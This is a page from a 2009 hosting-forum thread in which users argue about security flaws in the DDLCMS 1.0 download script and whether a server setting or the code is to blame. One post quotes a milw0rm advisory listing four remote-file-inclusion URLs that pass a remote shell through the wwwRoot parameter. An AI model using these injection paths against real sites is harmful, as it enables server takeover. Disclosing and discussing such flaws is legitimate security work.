Activity Stream
48,167 MEMBERS
6761 ONLINE
besthostingforums On YouTube Subscribe to our Newsletter besthostingforums On Twitter besthostingforums On Facebook besthostingforums On facebook groups

Page 2 of 7 FirstFirst 1234 ... LastLast
Results 11 to 20 of 70

Hybrid View

Orange DDLCMS question? 27th Jun 2009, 04:47 PM
Loget Its been recently released and bugs... 27th Jun 2009, 05:22 PM
Little Dragon Version 1.0, which is beta, is now... 27th Jun 2009, 06:44 PM
DEViANCE I just installed this and am pretty... 23rd Sep 2009, 04:51 AM
Little Dragon *sigh* more disrespect and... 24th Sep 2009, 01:42 AM
CyberHacK Lmao When was this last replied to... 23rd Sep 2009, 07:26 AM
DEViANCE I used search, wasn't paying... 23rd Sep 2009, 09:06 AM
JmZ Full of exploits anyway. Based on... 23rd Sep 2009, 09:04 AM
William Palmer Hey Dragon ill talk more with you... 24th Sep 2009, 03:34 AM
DEViANCE That sounds great, will look... 24th Sep 2009, 03:35 AM
JmZ Little Dragon im not "bashing" or... 24th Sep 2009, 10:15 AM
William Palmer JmZ you can not expect one to be... 24th Sep 2009, 11:12 AM
JmZ Strange example, but dragon should... 24th Sep 2009, 01:59 PM
DEViANCE Its only the first version though... 24th Sep 2009, 05:56 PM
CyberHacK Definently looking forward to it... 24th Sep 2009, 06:00 PM
Little Dragon @ William: Thanks for the report... 24th Sep 2009, 08:15 PM
JmZ I love it when I get quoted so many... 25th Sep 2009, 08:17 AM
DEViANCE That makes sence but are there any... 25th Sep 2009, 08:30 AM
r0ck ^well said, exactly what i was... 25th Sep 2009, 08:20 AM
JmZ DEViANCE: PHP 5.3 has it disabled... 25th Sep 2009, 08:44 AM
DEViANCE Anybody not using php 5 is crazy..... 25th Sep 2009, 09:03 AM
William Palmer Well darn :( Ok @ deviance on... 25th Sep 2009, 11:03 AM
Little Dragon Keep in mind, you are all testing... 25th Sep 2009, 03:01 PM
Dman Good work on fixing exploit :) 25th Sep 2009, 03:07 PM
JmZ I'm simply pointing out facts, it... 25th Sep 2009, 05:10 PM
Little Dragon Here, let me repeat myself the... 25th Sep 2009, 05:18 PM
JmZ Yes I see, it's a beta. But is it... 25th Sep 2009, 05:38 PM
Crucify both of you should partner up =D 25th Sep 2009, 05:43 PM
JmZ Well he's not the coder so that... 25th Sep 2009, 05:45 PM
Little Dragon God damn. How many times are you... 25th Sep 2009, 06:45 PM
yais Could we keep the JmZ... 25th Sep 2009, 06:47 PM
JmZ Exploits. Meaning you fixed one... 25th Sep 2009, 07:05 PM
Little Dragon Finally! Good riddance! Yeah,... 25th Sep 2009, 08:31 PM
Ak47 ^ redtube.com will solve all... 25th Sep 2009, 07:29 PM
iKnow I totally agree with you, Ak47 :D 25th Sep 2009, 07:55 PM
DEViANCE Going right off topic now..... ... 25th Sep 2009, 08:08 PM
r0ck just want to point out this is the... 25th Sep 2009, 08:48 PM
DEViANCE I will be here till the bitter end,... 25th Sep 2009, 08:39 PM
DEViANCE Ahhhh i get it.... selfish. Well... 25th Sep 2009, 08:55 PM
Dman You need to realise that not... 25th Sep 2009, 10:18 PM
Bread topddl reloaded ftw! But on a... 25th Sep 2009, 11:29 PM
DEViANCE First i agree in part... BUT, I am... 26th Sep 2009, 12:09 PM
JmZ I'm sorry but I have to reply to... 26th Sep 2009, 02:09 PM
DEViANCE Its not me trying to force my... 25th Sep 2009, 10:31 PM
r0ck me either :) but I may have... 25th Sep 2009, 10:50 PM
DEViANCE NP, this argument cr@p is silly... 25th Sep 2009, 11:20 PM
Crucify so according to you any warez sites... 26th Sep 2009, 12:34 AM
el_jentel1 Obviously this is a little about... 26th Sep 2009, 12:35 AM
Bread Making money to keep your site... 26th Sep 2009, 12:45 AM
Elio money is needed to expand my... 26th Sep 2009, 01:03 AM
Hx lol if you want a good secure... 26th Sep 2009, 07:54 AM
JmZ What bread and anyone else who is... 26th Sep 2009, 08:23 AM
Curtis129 im so supirsed this thread didnt... 26th Sep 2009, 10:48 AM
Little Dragon Thanks Curtis for the reply. But... 26th Sep 2009, 02:21 PM
Hyperz Any new code will have its issues,... 26th Sep 2009, 12:41 PM
DEViANCE @hyperz i agree but it seems some... 26th Sep 2009, 01:29 PM
Curtis129 Guys, WCDDL and DDL CMS, do the... 26th Sep 2009, 01:58 PM
DEViANCE I am experinced to a certain level,... 26th Sep 2009, 02:13 PM
ChosenOne I am experinced to a certain level,... 26th Sep 2009, 02:18 PM
DEViANCE http://www.hotscripts.com/listing/mo... 26th Sep 2009, 02:22 PM
JmZ You're missing something little... 26th Sep 2009, 02:23 PM
ChosenOne You misunderstood JmZ. He said your... 26th Sep 2009, 02:24 PM
DEViANCE They way its said is like "i know... 26th Sep 2009, 02:28 PM
ChosenOne Little_Dragon is professional... 26th Sep 2009, 02:30 PM
DEViANCE Its quite clearly stated many times... 26th Sep 2009, 02:39 PM
Little Dragon Thanks DEViANCE for pointing out an... 26th Sep 2009, 05:34 PM
CyberHacK +1 Little Dragon. 26th Sep 2009, 05:39 PM
JmZ We shall see upon release which you... 26th Sep 2009, 07:04 PM
Little Dragon So you're saying, once the new... 26th Sep 2009, 08:26 PM
Optimus Prime Don't bother with him Little... 26th Sep 2009, 08:38 PM
Previous Post Previous Post   Next Post Next Post
  1.     
    #1
    (╯?□?)╯︵ ┻━┻
    Website's:
    Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.com
    Little Dragon im not "bashing" or whatever you want to call it.

    I'm just stating that, genuinly and truthfully, it is full of exploits. Not my problem if you can't find them yourself.
    JmZ Reviewed by JmZ on . DDLCMS question? I saw before that DDLCMS was still very buggy doesn't anyone know if the bug list has shortened? Thanks! Rating: 5

  2.   Sponsored Links

  3.     
    #2
    Banned
    Website's:
    Dev-Security.net
    JmZ you can not expect one to be perfect in all for example lets take a Police Officer his main task is to protect us and then we have the hacker which does illegal use of the pc

    now the polie officers thoughts and ideas are beyond the scope of hacking methodology

    so he decides to make a script and publishes and there is a exploit in it should we blame him for the lack of him not know hacking methodology?

    no we should not we all specialize in different aspects of life Little Dragon might be good at this as you might good at something else does that make you better or not? that's reportorial btw.

  4.     
    #3
    (╯?□?)╯︵ ┻━┻
    Website's:
    Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.com
    Strange example, but dragon should know how to remove examples.
    So it isn't really relevant.

    Anyway, as I said in my previous post and every other relevant post, i'm posting facts, nothing related to little dragon himself.

  5.     
    #4
    Member
    Website's:
    zomgbbqpizza.com evilddl.com scenemarket.org
    Its only the first version though and has a lot of features, it bound to have some teething problems but its a far more complete script than ANYTHING out there now, i have tried them all.

    Why not help rather than saying "its your own fault if you can't find them" ??

  6.     
    #5
    Banned
    Website's:
    FusionWarez.info SmokeHost.net Leechers.co
    Definently looking forward to it Little Dragon . I'm even loving version 1.0 which means the next version will rock.

  7.     
    #6
    Member
    Website's:
    ddlcms.com xsaimex.com warezgod.com
    @ William: Thanks for the report bro. It has been forwarded to the dev. team to see if it is an issue and if it is, it will be addressed and fixed.

    Edit: It appears that the exploit you reported is not an exploit of the script itself, but rather, a server setting, namely, allow_url_include.

    If a server has allow_url_include set to "On", that is a security risk, for any script. Here is the response from the dev team:

    "if they've got allow_url_include turned on, this is a huge problem. The script really can't be responsible for their misconfigurations.
    This exploit for misconfigured servers has been removed in the latest release of
    this script. "


    So, even if a server is misconfigured, the script still blocks the so-called exploit, so it's been fixed already Thanks for the heads up though, I love it when people try to help, so it's much appreciated William!
    Quote Originally Posted by JmZ View Post
    Little Dragon im not "bashing" or whatever you want to call it.
    If you aren't trying to bash my script, then what are you trying to do? Help me? Like the others who have provided useful information and have given me suggestions and such? Who are you trying to fool? No one on this board I bet (except yourself).

    Quote Originally Posted by JmZ View Post
    I'm just stating that, genuinly and truthfully, it is full of exploits. Not my problem if you can't find them yourself.
    So, Jmz, what's your point? What are you trying to accomplish? Nevermind, dont' bother answering, I'm sick of seeing your ignorant replies to my work.

    I'd rather hear from people like William who actually try to HELP me and everyone else out with the development of this script. If you don't want to help, then once again I say, go find something productive to do.

    Quote Originally Posted by JmZ View Post
    Strange example, but dragon should know how to remove examples.
    So it isn't really relevant.

    Anyway, as I said in my previous post and every other relevant post, i'm posting facts, nothing related to little dragon himself.
    Yeah, right. [JmZ, do me a favour and hover your mouse cursor over this smiley ]

    Quote Originally Posted by DEViANCE View Post
    Its only the first version though and has a lot of features, it bound to have some teething problems but its a far more complete script than ANYTHING out there now, i have tried them all.

    Why not help rather than saying "its your own fault if you can't find them" ??
    DEViANCE, thanks for the comments. Well said bro

    Quote Originally Posted by CyberHacK View Post
    Definently looking forward to it Little Dragon . I'm even loving version 1.0 which means the next version will rock.
    Thanks CyberHack, that's the goal. It will indeed rock!

  8.     
    #7
    (╯?□?)╯︵ ┻━┻
    Website's:
    Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.com
    I love it when I get quoted so many times.

    I posted here saying it contains exploits, because it does.

    As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.

  9.     
    #8
    Member
    Website's:
    zomgbbqpizza.com evilddl.com scenemarket.org
    Quote Originally Posted by JmZ View Post
    I love it when I get quoted so many times.

    I posted here saying it contains exploits, because it does.

    As for your reasoning of one exploit being due to "allow_url_include", the script should check paths before it tries including them (which it isn't, obviously). Regardless of if that server setting is set or not, that variable in the URL should be checked to be within the server's directories and not above a certain level. Coders should know these kind of things instead of blaming it on a server setting. The server setting just "enables" the exploit, it isn't the reason for it. The reason for it is the code.
    That makes sence but are there any servers that actually have that setting on??

    I don't like the way it is using a number to count the path (or however it works), and even worse that it is hardcoded.. it seems like a strange method.

    But back to that exploit here it is:
    Code: 
    +============================================================+
    |                                                            |
    | DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
    |                                                            |
    +============================================================+
    |                                                            |
    | Author : HxH                                               |
    |                                                            |
    | E-Mail : HxH[at]live[dot]at                                |
    |                                                            |
    +------------------------------------------------------------+
    |                                                            |
    | Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
    |                                                            |
    +------------------------------------------------------------+
    |                                                            |
    | Exploit :                                                  |
    |                                                            |
    | /header.php?wwwRoot=[Shell.txt?]                           |
    |                                                            |
    | /submit.php?wwwRoot=[Shell.txt?]                           |
    |                                                            |
    | /submitted.php?wwwRoot=[Shell.txt?]                        |
    |                                                            |
    | /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
    |                                                            |
    +============================================================+
    |                                                            |
    | Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
    |                                                            |
    +============================================================+
    
    # milw0rm.com [2009-09-21]
    But i tried to find any servers running ddl cms with this setting on (for testing purposes not malicious) and couldn't find one.

    Seriously though if we all work together and try and fix any problems the script will be great.

  10.     
    #9
    Member
    ^well said, exactly what i was thinking but was going to stay out of this

  11.     
    #10
    (╯?□?)╯︵ ┻━┻
    Website's:
    Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.com
    DEViANCE: PHP 5.3 has it disabled by default i think, 5.2 or 5.1 may have it enabled. PHP4 doesn't even have the option as far as I know, meaning all PHP4 servers are vulnerable I suppose.

    As for working together to fix the problems, it's his script and his responsibility. It's just a script, the coders can and will fix it themselves (eventually).

Page 2 of 7 FirstFirst 1234 ... LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Help with DDLCMS
    By Darkstar in forum Forum and DDL Discussion
    Replies: 11
    Last Post: 23rd May 2011, 07:54 AM
  2. DDLCMS 3.2 help
    By FuBu in forum Forum and DDL Discussion
    Replies: 2
    Last Post: 16th Apr 2011, 02:52 PM
  3. help with ddlcms!
    By cyber-cliff in forum Technical Help Desk Support
    Replies: 5
    Last Post: 18th Feb 2011, 04:14 PM
  4. DDLCMS Someone help?
    By lonerunner in forum Forum and DDL Discussion
    Replies: 18
    Last Post: 18th Nov 2009, 01:20 AM

Tags for this Thread

BE SOCIAL